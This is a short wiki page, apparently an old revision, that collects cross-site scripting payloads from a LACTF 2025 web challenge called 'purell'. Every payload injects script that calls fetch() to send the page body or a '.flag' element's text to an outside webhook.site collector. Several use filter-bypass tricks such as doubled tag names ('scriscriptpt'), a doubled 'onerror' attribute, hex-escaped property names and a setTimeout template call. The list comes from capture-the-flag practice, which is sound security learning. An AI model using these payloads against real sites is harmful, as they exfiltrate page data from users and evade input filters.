User Tools

Site Tools


xss-payloads

This is an old revision of the document!


HTTP Pipelining + HTTP/2 Single Packets

Some payloads from LACTF 2025: [WEB] purell

https://github.com/uclaacm/lactf-archive/blob/main/2025/web/purell/payloads.txt

<script>
 fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURIComponent(document.body.innerHTML))
</script>
 
<img src=/f onerror=fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURIComponent(document.body.innerHTML))>
 
<SCRIPT>
 fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURI(document.body.innerHTML))
</SCRIPT>
 
<scriscriptpt>
  fetch(
 		'https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q=' +
		document['query\x53elector']('.flag')['text\x43\x6fntent']
  )
</scriscriptpt>
 
<img src=/foo oonnerror="fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q=' + document['query\x53elector']('.flag')['text\x43\x6fntent'])"//
 
<img/src="/foo"/oonnerror="fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q=' + document['query\x53elector']('.flag')['text\x43\x6fntent'])"//
 
<img/src="/foo"/oonnerror="window['set\x54imeout']`fetch\x28'https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q=' + document['query\x53elector']\x28'.flag'\x29['text\x43\x6fntent']\x29`"//
xss-payloads.1739144058.txt.gz · Last modified: 2025/02/09 23:34 by osorin